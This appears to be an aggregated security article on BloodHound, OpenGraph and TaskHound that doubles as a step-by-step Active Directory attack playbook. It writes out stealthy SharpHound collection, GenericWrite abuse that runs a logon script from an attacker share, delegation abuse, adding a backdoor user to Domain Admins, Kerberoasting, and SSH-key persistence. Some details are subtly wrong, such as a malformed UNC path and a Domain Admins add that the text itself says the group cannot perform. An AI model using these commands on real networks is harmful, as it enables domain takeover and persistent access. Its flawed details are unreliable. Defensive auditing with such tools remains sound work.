Listen to this Post
Introduction:
The landscape of Active Directory (AD) exploitation is evolving with the integration of OpenGraph protocols into popular security tools. The emerging integration between BloodHound, the premier AD attack path mapping tool, and TaskHound demonstrates a new frontier in automating and visualizing complex attack chains, pushing the boundaries of both offensive security and defensive hardening.
Learning Objectives:
- Understand the core concepts of BloodHound, OpenGraph, and how their integration enhances attack path analysis.
- Learn to utilize key BloodHound Cypher queries for identifying critical attack paths and privileged service accounts.
- Master the commands for data collection with SharpHound and the methodology for exploiting discovered relationships.
You Should Know:
1. Data Collection with SharpHound
SharpHound is the data collector for BloodHound. It gathers information about users, groups, computers, and their relationships within the AD environment.
Command:
Ingest all data using the CollectionMethod All SharpHound.exe --CollectionMethod All --Domain corp.com --ZipFilename corp_data.zip Perform a stealthy, targeted collection for logged-on users and session data SharpHound.exe -c Session,LoggedOn,GroupMembership --Stealth --Loop --loopduration 00:30:00 --jitter 23
Step-by-step guide:
This command, executed from a domain-joined Windows machine, initiates a comprehensive data collection. The `–CollectionMethod All` parameter instructs SharpHound to enumerate all available data points, including group membership, local admin rights, and Active Directory sessions. The `–ZipFilename` parameter consolidates the output into a single, compressed file for easy ingestion into the BloodHound UI. The second command is designed for stealthier operations, collecting specific data types over a 30-minute period with jitter to avoid pattern-based detection.
2. Identifying High-Value Attack Paths with Cypher
BloodHound’s power lies in its graph database, queried using the Cypher language. This query finds the shortest path from a compromised user to a high-value target like a Domain Admin.
Cypher Query:
MATCH (u:User {name: "[email protected]"}), (g:Group {name: "DOMAIN [email protected]"}), p = shortestPath((u)-[1..]->(g)) RETURN p
Step-by-step guide:
This query is executed within the BloodHound user interface’s analysis tab. It defines a start node (u) as a specific user and an end node (g) as the Domain Admins group. The `p = shortestPath((u)-[1..]->(g))` portion uses a graph theory algorithm to find the most direct relationship chain (through group membership, ACLs, etc.) connecting the user to the privileged group. The results visually map the exact steps an attacker would need to take.
3. Exploiting GenericWrite Permissions
A common finding in BloodHound is a user having `GenericWrite` permissions over another user or computer object, allowing for attribute modification and privilege escalation.
PowerShell Commands:
Using PowerView to abuse GenericWrite on a user to set a scriptPath (logon script)
Set-DomainObject -Identity TargetUser -Set @{scriptpath='\attacker-server\scripts\malicious.cmd'} -Verbose
Using PowerView to abuse GenericWrite on a computer object for Resource-Based Constrained Delegation
Set-DomainObject -Identity TargetComputer$ -Set @{'msds-allowedtoactonbehalfofotheridentity'=(Get-DomainComputer AttackerComputer$).securityidentifier} -Verbose
Step-by-step guide:
The first command modifies the `scriptPath` attribute of a target user. The next time that user logs on, the system will execute the script from the attacker-controlled share, potentially granting the attacker code execution in the user’s context. The second command configures Resource-Based Constrained Delegation on a target computer, allowing the attacker’s computer to impersonate users on it. This requires the attacker to already have control over a computer account.
4. Leveraging Dangerous Built-in Groups
Groups like `Account Operators` have potentially dangerous permissions that can be misused, even if they are not directly privileged.
Command (via net.exe):
Add a user to a group using the Account Operators membership net group "Domain Admins" NewBackdoorUser /add /domain
Step-by-step guide:
While the `Account Operators` group cannot modify highly privileged groups like Domain Admins by default, it has extensive permissions over other accounts. This command demonstrates the principle: if a user in `Account Operators` has the ability to create or modify an account that is a member of a privileged group (or has other rights), they can escalate privileges. BloodHound will reveal if such a path exists.
5. DCSync Attack Detection and Mitigation
The DCSync attack allows an attacker to impersonate a domain controller and replicate password data. BloodHound can identify users or computers with the replication rights necessary to perform this.
Cypher Query to Find DCSync Principals:
MATCH (n) WHERE (n.objectid CONTAINS "S-1-5-21") AND (n:User OR n:Computer) WITH n MATCH (n)-[r:GetChanges|GetChangesAll|GetChangesInFilteredSet]->(d:Domain) RETURN n.name, r.relationship, d.name
Step-by-step guide:
This Cypher query identifies all users and computers that have the `GetChanges` or `GetChangesAll` privileges over a domain, which are the exact rights required for a DCSync attack. Defensively, this query is critical for auditing. To mitigate, these permissions should be restricted to only essential Domain Controllers and highly protected backup accounts.
6. Kerberoasting from a Compromised Context
Kerberoasting is a common technique for attacking service accounts. BloodHound often reveals paths that allow a low-privilege user to request service tickets for target accounts.
Command (from a Linux perspective with Impacket):
Request service tickets for all SPNs in the domain and output them in a format crackable by Hashcat python3 GetUserSPNs.py -dc-ip 10.10.10.10 corp.com/standard_user -request
Step-by-step guide:
This command uses the Impacket toolkit’s `GetUserSPNs.py` script. It queries the Domain Controller (-dc-ip) for all Service Principal Names (SPNs). If the standard user has the necessary permissions to request these tickets (which is common), the script will return Ticket-Granting Service (TGS) tickets. These are encrypted with the service account’s password hash and can be taken offline for brute-force cracking with tools like Hashcat.
7. Linux Persistence via SSH Authorized Keys
In hybrid environments, compromising an account with SSH access to a Linux server connected to AD can be a critical pivot point.
Command:
Append an attacker's public key to the authorized_keys file of a user for persistence echo "ssh-rsa AAAAB3NzaC1yc2E... attacker@kali" >> ~/.ssh/authorized_keys Set correct permissions chmod 600 ~/.ssh/authorized_keys
Step-by-step guide:
This is a fundamental persistence technique. After gaining initial access to a Linux box (e.g., via a cracked password found through Kerberoasting), the attacker adds their public SSH key to the `authorized_keys` file of the current or another compromised user. This allows for password-less, persistent access to the server. The `chmod` command ensures the file permissions are restrictive enough for the SSH daemon to accept the key.
What Undercode Say:
- The integration of OpenGraph standards into tools like BloodHound signifies a move towards interconnected security tooling, where data from disparate sources can be unified to create a more complete picture of an enterprise’s attack surface.
- Defenders must shift from a siloed view of permissions to a graph-based understanding, where the chain of relationships is the primary concern, not just the direct privileges of a single account.
The development of TaskHound leveraging BloodHound’s OpenGraph API is not just a feature update; it’s a paradigm shift. It points towards a future where complex, multi-tool attack workflows can be predefined, visualized, and executed with precision. For blue teams, this underscores the non-negotiable need to regularly run BloodHound in their own environments, using the same Cypher queries attackers use, to find and dismantle these paths before they are exploited. The automation of attack path discovery lowers the barrier to entry for less skilled attackers while simultaneously increasing the efficiency of advanced actors.
Prediction:
The formalization and standardization of attack path data through protocols like OpenGraph will lead to an explosion of automated “attack playbooks.” In the next 18-24 months, we will see a rise in AI-driven penetration testing tools that can autonomously navigate BloodHound-identified paths, make logical decisions about which exploitation technique to use, and execute complex attack chains with minimal human interaction. This will drastically reduce the time from initial compromise to domain dominance, forcing defenders to adopt equally automated and continuous threat path monitoring and mitigation systems.
🎯Let’s Practice For Free:
IT/Security Reporter URL:
Reported By: Robin Unglaub – Hackers Feeds
Extra Hub: Undercode MoN
Basic Verification: Pass ✅
